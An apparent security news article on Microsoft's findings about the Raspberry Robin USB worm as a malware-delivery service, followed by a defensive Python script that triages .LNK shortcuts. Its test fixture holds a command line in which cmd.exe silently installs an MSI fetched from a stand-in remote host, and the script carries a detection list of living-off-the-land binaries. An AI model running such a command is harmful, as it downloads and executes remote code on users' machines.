Microsoft has warned that the Raspberry Robin worm is being used to deliver a range of follow-on malware, including ransomware, to infected endpoints.
The malware, first identified in late 2021 when its end goal was still unknown, appears to have evolved into an infection service offered to anyone with the means to pay.
In a blog post, Microsoft security researchers describe Raspberry Robin as “part of a complex and interconnected malware ecosystem,” with connections to other malware families and attack techniques.
Infection For Hire
Whoever is responsible for Raspberry Robin has been busy over the past few weeks. Data from Microsoft Defender for Endpoint indicates that in the past 30 days, at least 3,000 devices across 1,000 companies have received alerts relating to the Raspberry Robin payload.
The company went on to say that Raspberry Robin has delivered several different payloads, including IcedID, Bumblebee, Truebot and, from July 2022, the FakeUpdates malware associated with EvilCorp.
In October 2022, Microsoft also observed FIN11 (also tracked as TA505, the group behind the Dridex banking trojan and Locky ransomware) using Raspberry Robin. According to the company, these intrusions progressed to hands-on-keyboard activity using Cobalt Strike, sometimes with a Truebot infection sitting between the Raspberry Robin and Cobalt Strike stages. Once the Cobalt Strike beacon was active, the attackers deployed Clop ransomware.
Microsoft's assessment is that the Raspberry Robin operators are paid to deliver other groups' malware and ransomware to victims' endpoints.
The report notes that the groups behind these Raspberry Robin-linked campaigns, who otherwise distribute their malware through channels such as malicious ads or email, are likely paying the Raspberry Robin operators for installations on already-infected machines. The arrangement is another example of how interconnected the cybercriminal economy has become.
Red Canary researchers first identified Raspberry Robin after spotting a “cluster of malicious activity.” The worm spreads offline, primarily through infected USB drives: when the researchers examined an infected flash drive, they found that it reaches new devices by way of a malicious .LNK shortcut file on the drive.
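A practical check that follows from the USB/.LNK propagation method is to triage every shortcut on a removable drive before anyone double-clicks it. The script below is an added example written for this article; it is not code from Microsoft or Red Canary, and it does not reproduce Raspberry Robin's actual shortcut. It parses the Shell Link header and string fields of each .lnk (per the public MS-SHLLINK layout) and flags shortcuts that point at a command interpreter or installer host, carry a URL or UNC path in their arguments, chain into a second living-off-the-land binary, or open minimized to hide a console window. The indicator list, the `build_lnk` fixture builder and the two sample shortcuts (one document link, one invented cmd.exe/msiexec link using an `.invalid` domain) are assumptions made for the example.

```python
"""Triage Windows .LNK shortcuts on a removable drive (added example, not the reports' code)."""
import os
import re
import struct
import tempfile
from dataclasses import dataclass

# Shell Link header constants (public MS-SHLLINK layout)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that opens the window minimized

# Assumed indicator list: binaries a document shortcut on a USB stick has no reason to launch
LOLBINS = {"cmd", "msiexec", "powershell", "pwsh", "wscript", "cscript",
           "rundll32", "mshta", "regsvr32", "certutil", "bitsadmin"}


@dataclass
class Shortcut:
    show_cmd: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes):
    """Return a Shortcut, or None if the bytes are not a well-formed Shell Link file."""
    try:
        if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE \
                or data[4:20] != LNK_CLSID:
            return None
        flags = struct.unpack_from("<I", data, 20)[0]
        show_cmd = struct.unpack_from("<I", data, 60)[0]
        off = LNK_HEADER_SIZE
        if flags & HAS_ID_LIST:    # LinkTargetIDList: 2-byte size, then the item IDs
            off += 2 + struct.unpack_from("<H", data, off)[0]
        if flags & HAS_LINK_INFO:  # LinkInfo: 4-byte total size that includes the size field
            off += struct.unpack_from("<I", data, off)[0]

        def read_string() -> str:  # StringData: 2-byte char count, no terminator
            nonlocal off
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw, off = data[off:off + width * count], off + width * count
            return raw.decode("utf-16-le" if width == 2 else "latin-1", errors="replace")

        sc = Shortcut(show_cmd=show_cmd)
        for flag, attr in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                           (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                           (HAS_ICON, "icon_location")):
            if flags & flag:
                setattr(sc, attr, read_string())
        return sc
    except struct.error:
        return None


def assess(sc: Shortcut) -> list:
    """Heuristic findings for one shortcut; indicators are assumptions for this example."""
    findings = []
    target = os.path.basename(sc.relative_path.replace("\\", "/")).lower()
    stem = target[:-4] if target.endswith(".exe") else target
    args = sc.arguments.lower()
    if stem in LOLBINS:
        findings.append(f"target is a script/installer host: {target}")
    if "://" in args:
        findings.append("arguments contain a URL")
    if "\\\\" in sc.arguments:
        findings.append("arguments reference a UNC path")
    if LOLBINS & set(re.findall(r"[a-z0-9]+", args)):
        findings.append("arguments chain into another living-off-the-land binary")
    if sc.show_cmd == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimized (console hidden from the user)")
    return findings


def scan_tree(root: str) -> dict:
    """Walk a mounted drive; return {path: findings} for each suspicious or malformed .lnk."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".lnk"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                sc = parse_lnk(fh.read())
            if sc is None:
                report[path] = ["file has .lnk extension but no valid Shell Link header"]
            elif assess(sc):
                report[path] = assess(sc)
    return report


def build_lnk(relative_path: str, arguments: str = "", working_dir: str = "",
              show_cmd: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk in memory (fixture builder for this example only)."""
    flags = IS_UNICODE | (HAS_REL_PATH if relative_path else 0) \
        | (HAS_WORK_DIR if working_dir else 0) | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments) if s)
    return header + body


# Constructed fixtures: a document shortcut, and an invented shortcut that launches cmd.exe
# to fetch an installer from a remote host (not Raspberry Robin's real command line).
BENIGN_LNK = build_lnk(r".\Reports\Q3-summary.docx")
SUSPICIOUS_LNK = build_lnk(r"..\..\Windows\System32\cmd.exe",
                           r'/c start msiexec /q /i "http://example.invalid/u.msi"',
                           show_cmd=SW_SHOWMINNOACTIVE)


def demo() -> dict:
    """Write the fixtures to a scratch 'drive', scan it, and return {filename: findings}."""
    with tempfile.TemporaryDirectory() as drive:
        for name, blob in (("Q3-summary.lnk", BENIGN_LNK),
                           ("USB Drive (32GB).lnk", SUSPICIOUS_LNK),
                           ("notes.lnk", b"not a shortcut")):
            with open(os.path.join(drive, name), "wb") as fh:
                fh.write(blob)
        return {os.path.basename(p): f for p, f in scan_tree(drive).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

Run `scan_tree("E:\\")` (or the mount point of the stick) from an analysis host with autorun disabled. The parser deliberately skips the LinkTargetIDList and LinkInfo blocks and reads only the string fields, so it never resolves or executes the target; treat any flagged file as something to hand to a sandbox rather than open.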